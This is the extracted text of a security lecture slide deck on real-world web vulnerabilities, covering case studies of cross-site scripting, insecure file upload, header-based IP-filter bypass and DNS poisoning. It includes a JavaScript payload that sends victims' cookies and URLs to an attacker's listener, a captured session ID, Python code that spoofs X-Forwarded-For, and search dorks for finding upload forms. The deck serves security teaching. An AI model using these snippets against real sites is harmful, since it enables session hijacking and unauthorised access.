Presentation is loading. Please wait.

Presentation is loading. Please wait.

IDAsec copyright - all rights reserved1 Web Vulnerabilities in the real world.

Similar presentations

Presentation on theme: "IDAsec copyright - all rights reserved1 Web Vulnerabilities in the real world."— Presentation transcript:

1 IDAsec copyright - all rights reserved1 Web Vulnerabilities in the real world

2 IDAsec copyright - all rights reserved2 About me @Linkedin – Itzik Moshe Security Researcher Co-Founder & CEO of IDAsec Lecturer - See-Security College

3 IDAsec copyright - all rights reserved3 Known terms XSS SQLi CSRF Bla bla bla...

4 IDAsec copyright - all rights reserved4 Study Case #1 - XSS Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it. An attacker can use XSS to send a malicious script to an unsuspecting user. The end user’s browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page. For more details on the different types of XSS flaws

5 IDAsec copyright - all rights reserved5 Example

6 IDAsec copyright - all rights reserved6 Example

7 IDAsec copyright - all rights reserved7 Study Case #1 – XSS Admin Panel Server Website Server No Connection between Main site & Admin panel Temporary DB / Synchronized DB

8 IDAsec copyright - all rights reserved8 Contact Us

9 IDAsec copyright - all rights reserved9 Study Case #1 - XSS var c = document.cookie; var u = document.URL;"POST","myserver/listener",true); xmlhttp.send("cookie=” + c + ”&url=" + u);

10 IDAsec copyright - all rights reserved10 Server Side Cookie: "PHPSESSID=56669e7e1e131dc965ad8e9adc 7501e0" Url:

11 IDAsec copyright - all rights reserved11 Inject the Cookie

12 IDAsec copyright - all rights reserved12 Study Case #2 – Insecure Upload Uploaded files represent a significant risk to applications. The first step in many attacks is to get some code to the system to be attacked. Then the attack only needs to find a way to get the code executed. Using a file upload helps the attacker accomplish the first step. The consequences of unrestricted file upload can vary, including complete system takeover, an overloaded file system or database, forwarding attacks to back-end systems, and simple defacement. It depends on what the application does with the uploaded file and especially where it is stored. There are really two classes of problems here. The first is with the file metadata, like the path and file name. These are generally provided by the transport, such as HTTP multi-part encoding. This data may trick the application into overwriting a critical file or storing the file in a bad location. You must validate the metadata extremely carefully before using it. The other class of problem is with the file size or content. The range of problems here depends entirely on what the file is used for. See the examples below for some ideas about how files might be misused. To protect against this type of attack, you should analyze everything your application does with files and think carefully about what processing and interpreters are involved

13 IDAsec copyright - all rights reserved13 Study Case #2 – Insecure Upload Main Local Server + Temporary DB Off-line Server + main DB Website(3rd party)

14 IDAsec copyright - all rights reserved14 Some Google dorking... intext:upload inurl:upload intext:upload

15 IDAsec copyright - all rights reserved15 Phishing

16 IDAsec copyright - all rights reserved16 Study Case #2 – Insecure Upload Reverse connection within 3mins Inside VPN IT Manager Turned off the entire company after 2 hours White night(ops...)

17 IDAsec copyright - all rights reserved17 Study Case #3 – Dumb Mistakes

18 IDAsec copyright - all rights reserved18 Study Case #3 – Dumb Mistakes HTTP Header IP Filter X-Forwarded-For

19 IDAsec copyright - all rights reserved19 Study Case #3 – Dumb Mistakes Login.php~ List of authorized IP address

20 IDAsec copyright - all rights reserved20 Injecting Header import urllib2,cookielib cj = cookielib.CookieJar() opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) opener.addheaders = [('HTTP_X_FORWARDED_FOR',''),]'')

21 IDAsec copyright - all rights reserved21 Conclusions CHAEP OUTSOURCING != SECURITY

22 IDAsec copyright - all rights reserved22 Case Study #4 – Authentication

23 IDAsec copyright - all rights reserved23 Local Network DNS Manipulation Poison DNS response Attacker runs Local PHP Proxy Steal victim's credentials

24 IDAsec copyright - all rights reserved24 Example

25 IDAsec copyright - all rights reserved25 Solutions(sort of) Cookies Management Authentication Layers(Code) JavaScript / Ajax Solutions

26 IDAsec copyright - all rights reserved26 Questions?

Download ppt "IDAsec copyright - all rights reserved1 Web Vulnerabilities in the real world."

Similar presentations

Ads by Google